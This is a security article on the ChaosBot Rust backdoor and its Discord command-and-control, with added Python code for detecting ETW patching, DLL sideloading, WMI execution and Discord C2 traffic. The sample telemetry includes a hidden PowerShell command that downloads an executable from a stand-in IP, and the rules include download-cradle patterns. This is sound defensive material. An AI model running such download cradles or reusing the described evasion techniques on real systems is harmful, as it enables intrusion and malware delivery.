
ChaosBot: Rust Backdoor Using Discord for Command-and-Control

Security researchers have disclosed a new Rust-based backdoor called ChaosBot that enables attackers to perform reconnaissance and execute arbitrary commands on compromised Windows hosts.


Security researchers have disclosed a new Rust-based backdoor called ChaosBot that enables attackers to perform reconnaissance and execute arbitrary commands on compromised Windows hosts. First observed in late September 2025 within a financial services environment, the malware is notable both for its use of Discord as a command-and-control (C2) channel and for multiple deployment vectors including credential abuse and phishing.

Infection and Lateral Movement

eSentire’s investigation found that threat actors leveraged compromised credentials — including a Cisco VPN account and an over-privileged Active Directory account named serviceaccount — to run remote commands via WMI, allowing broad execution across the network. In other campaigns, the initial delivery relied on phishing messages containing malicious Windows shortcut (LNK) files. Opening the LNK triggers a PowerShell command that downloads and runs the ChaosBot payload while showing a decoy PDF (e.g., purported correspondence) to distract the victim.

Payload and Command Channel

The deployed payload is a DLL (reported as msedge_elf.dll) sideloaded via a Microsoft Edge binary (identity_helper.exe). After loading, ChaosBot performs system reconnaissance and downloads a fast reverse proxy (FRP) to establish a persistent reverse proxy into the compromised network. Operators have attempted (with mixed success) to provision VS Code Tunnels as alternate backdoors. In practice, ChaosBot primarily uses Discord: operators maintain Discord accounts (e.g., chaos_00019, lovebb0024) and create channels named for infected machines to issue commands and receive exfiltrated data.

Supported capabilities observed include: executing shell commands, capturing screenshots, uploading/downloading files, and sending captured files to the Discord channel.

Evasion Techniques

Newer ChaosBot variants include anti-analysis measures:

  • ETW bypass: patching the first instructions of ntdll!EtwEventWrite to neutralize Event Tracing for Windows.

  • VM detection: checking MAC address prefixes associated with VMware/VirtualBox and terminating if a match is found.

These techniques aim to hinder detection and forensic analysis.
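The defender-side counterpart of the ETW bypass described above is an integrity check on the first bytes of the ETW entry points in ntdll: if the in-memory prologue no longer matches a known-good baseline, something has rewritten it. The following is an added example, not code from the article or from the eSentire research. The baseline bytes are constructed placeholders (real baselines would be captured from a known-good host), `EtwEventWriteFull` is an assumed extra export worth watching alongside the `EtwEventWrite` named in the article, and the live reader only works on Windows inside the process being examined.

```python
"""Added example: prologue integrity check for ntdll ETW entry points.
Not from the article; baseline bytes below are constructed placeholders."""
import ctypes
import sys

PROLOGUE_LEN = 16  # bytes compared at the start of each function (assumption)

# EtwEventWrite is named in the article; EtwEventWriteFull is an assumed
# additional export that the same class of patch tends to touch.
WATCHED = ("EtwEventWrite", "EtwEventWriteFull")


def read_live_prologue(name: str, n: int = PROLOGUE_LEN):
    """Read n bytes at ntdll!<name> in the current process (Windows only).

    Returns None when not on Windows or when the export cannot be resolved,
    so the comparison logic can be exercised with a substitute reader.
    """
    if sys.platform != "win32":
        return None
    k32 = ctypes.windll.kernel32
    k32.GetModuleHandleW.restype = ctypes.c_void_p
    k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
    k32.GetProcAddress.restype = ctypes.c_void_p
    k32.GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    module = k32.GetModuleHandleW("ntdll.dll")
    addr = k32.GetProcAddress(module, name.encode("ascii")) if module else None
    return ctypes.string_at(addr, n) if addr else None


def first_difference(baseline: bytes, current: bytes) -> int:
    """Offset of the first differing byte, or -1 when the prologue is intact."""
    for offset, (expected, actual) in enumerate(zip(baseline, current)):
        if expected != actual:
            return offset
    if len(baseline) != len(current):
        return min(len(baseline), len(current))
    return -1


def check_prologues(baselines: dict, reader) -> dict:
    """Compare every baselined function against what reader(name) returns.

    Result per function: "intact", "patched at +<offset>" or "unreadable".
    """
    report = {}
    for name, expected in baselines.items():
        current = reader(name)
        if current is None:
            report[name] = "unreadable"
            continue
        offset = first_difference(expected, current)
        report[name] = "intact" if offset < 0 else f"patched at +{offset}"
    return report


# Constructed baseline bytes (NOT real ntdll code) standing in for a
# snapshot taken from a known-good host.
CONSTRUCTED_BASELINE = {
    "EtwEventWrite": bytes(range(0x10, 0x10 + PROLOGUE_LEN)),
    "EtwEventWriteFull": bytes(range(0x30, 0x30 + PROLOGUE_LEN)),
}

# Constructed "live" view in which EtwEventWrite's first byte was rewritten.
CONSTRUCTED_TAMPERED = {
    "EtwEventWrite": b"\x00" + CONSTRUCTED_BASELINE["EtwEventWrite"][1:],
    "EtwEventWriteFull": CONSTRUCTED_BASELINE["EtwEventWriteFull"],
}


def demo() -> dict:
    """Run the check against the constructed tampered snapshot."""
    return check_prologues(CONSTRUCTED_BASELINE, CONSTRUCTED_TAMPERED.get)


if __name__ == "__main__":
    for func, verdict in demo().items():
        print(f"{func}: {verdict}")
    # On a Windows host, pass read_live_prologue as the reader together with
    # a baseline captured from the same ntdll build.
```

The comparison is deliberately build-agnostic: rather than hard-coding what the prologue should look like, it diffs against a baseline captured from the same ntdll version, which is how an EDR or a memory-forensics script would approach it. An in-process reader only sees its own copy of ntdll; checking another process requires reading that process's memory, which the example leaves to the surrounding tooling.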

Related Destructive Ransomware Developments

Separately, Fortinet researchers described a Chaos-branded C++ ransomware that combines destructive deletion (targeting files above certain sizes) with clipboard hijacking that swaps cryptocurrency addresses to redirect funds. The ransomware masquerades as utilities (e.g., “System Optimizer”) and uses a variety of encryption and fallback methods, adding a financially motivated destructive element to the broader Chaos ecosystem.

Detection, Response, and Mitigation

Organizations should:

  • Enforce least privilege for service accounts and harden VPN and Active Directory credentials (MFA, rotation).

  • Monitor for anomalous WMI activity and lateral movement.

  • Block suspicious outbound domains and Discord-related C2 traffic where appropriate.

  • Inspect incoming LNK attachments.

Endpoint telemetry and EDR solutions should be tuned to detect DLL sideloading patterns, FRP use, and ETW tampering. Prompt threat hunting and incident response are essential once compromise is suspected.
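To make the detection guidance concrete, here is an added example (not code from the article, from eSentire, or from any product) that turns the behaviours described in the infection, payload and mitigation sections into rules run over constructed endpoint telemetry: a shell spawned by WmiPrvSE.exe, an Explorer-launched PowerShell download cradle (the LNK path), identity_helper.exe or msedge_elf.dll appearing outside Edge's install directory, and Discord connections from a process that is not a browser or the Discord client. The Edge install prefix, the browser allow-list and every event below are assumptions or constructed samples, not values from the report.

```python
"""Added example: behavioural rules for the ChaosBot chain over constructed
endpoint telemetry. Paths, allow-lists and events are assumptions."""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "process", "image_load" or "network"
    image: str = ""    # full path of the acting process
    parent: str = ""   # parent process path (process events)
    cmdline: str = ""  # command line (process events)
    loaded: str = ""   # DLL path (image_load events)
    dest: str = ""     # destination host (network events)


# Assumed legitimate location of Edge binaries such as identity_helper.exe.
EDGE_PREFIX = r"c:\program files (x86)\microsoft\edge\application"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumed processes that legitimately talk to Discord.
DISCORD_OK = {"msedge.exe", "chrome.exe", "firefox.exe", "discord.exe"}
DISCORD_DOMAINS = ("discord.com", "discordapp.com", "discord.gg")
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", re.I)


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def under(path: str, prefix: str) -> bool:
    return ntpath.normpath(path).lower().startswith(prefix)


def rule_wmi_remote_exec(e: Event):
    """Remote WMI command execution shows up as WmiPrvSE.exe spawning a shell."""
    if e.kind == "process" and base(e.parent) == "wmiprvse.exe" and base(e.image) in SHELLS:
        return "wmi_remote_exec"


def rule_lnk_powershell_download(e: Event):
    """A LNK opened from Explorer that runs a PowerShell download cradle."""
    if (e.kind == "process" and base(e.image) in POWERSHELL
            and base(e.parent) == "explorer.exe" and DOWNLOAD_CRADLE.search(e.cmdline)):
        return "lnk_powershell_download"


def rule_edge_sideload(e: Event):
    """identity_helper.exe running, or loading msedge_elf.dll, outside Edge's directory."""
    if e.kind == "process" and base(e.image) == "identity_helper.exe" and not under(e.image, EDGE_PREFIX):
        return "identity_helper_outside_edge"
    if (e.kind == "image_load" and base(e.image) == "identity_helper.exe"
            and base(e.loaded) == "msedge_elf.dll" and not under(e.loaded, EDGE_PREFIX)):
        return "msedge_elf_sideload"


def rule_discord_c2(e: Event):
    """Discord traffic from anything that is not a browser or the Discord client."""
    if (e.kind == "network" and e.dest.lower().endswith(DISCORD_DOMAINS)
            and base(e.image) not in DISCORD_OK):
        return "discord_from_unexpected_process"


RULES = (rule_wmi_remote_exec, rule_lnk_powershell_download, rule_edge_sideload, rule_discord_c2)


def scan(events):
    """Return (rule_name, process_basename) for every rule that fires."""
    findings = []
    for e in events:
        for rule in RULES:
            name = rule(e)
            if name:
                findings.append((name, base(e.image)))
    return findings


TEMP = r"C:\Users\victim\AppData\Local\Temp"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\128.0.0.0"

# Constructed sample telemetry: five malicious events followed by three benign ones.
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Windows\System32\cmd.exe",
          parent=r"C:\Windows\System32\wbem\WmiPrvSE.exe", cmdline="cmd.exe /c whoami"),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline=r"powershell -w hidden -c iwr http://203.0.113.5/p -OutFile %TEMP%\p.exe"),
    Event("process", image=TEMP + r"\identity_helper.exe",
          parent=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", cmdline="identity_helper.exe"),
    Event("image_load", image=TEMP + r"\identity_helper.exe", loaded=TEMP + r"\msedge_elf.dll"),
    Event("network", image=TEMP + r"\identity_helper.exe", dest="gateway.discord.gg"),
    Event("process", image=EDGE + r"\identity_helper.exe", parent=EDGE + r"\msedge.exe", cmdline="identity_helper.exe"),
    Event("network", image=EDGE + r"\msedge.exe", dest="discord.com"),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe", cmdline="powershell Get-Date"),
]

if __name__ == "__main__":
    for rule_name, proc in scan(SAMPLE_EVENTS):
        print(f"{rule_name}: {proc}")
```

Each rule keys on a relationship (parent and child, binary and load path, process and destination) rather than on a hash, so it still fires when the payload is rebuilt; the price is that the allow-lists and the Edge install prefix must reflect the real fleet, or the sideload and Discord rules will be noisy. In production these would be expressed in the EDR's or SIEM's own rule language, with the same logic.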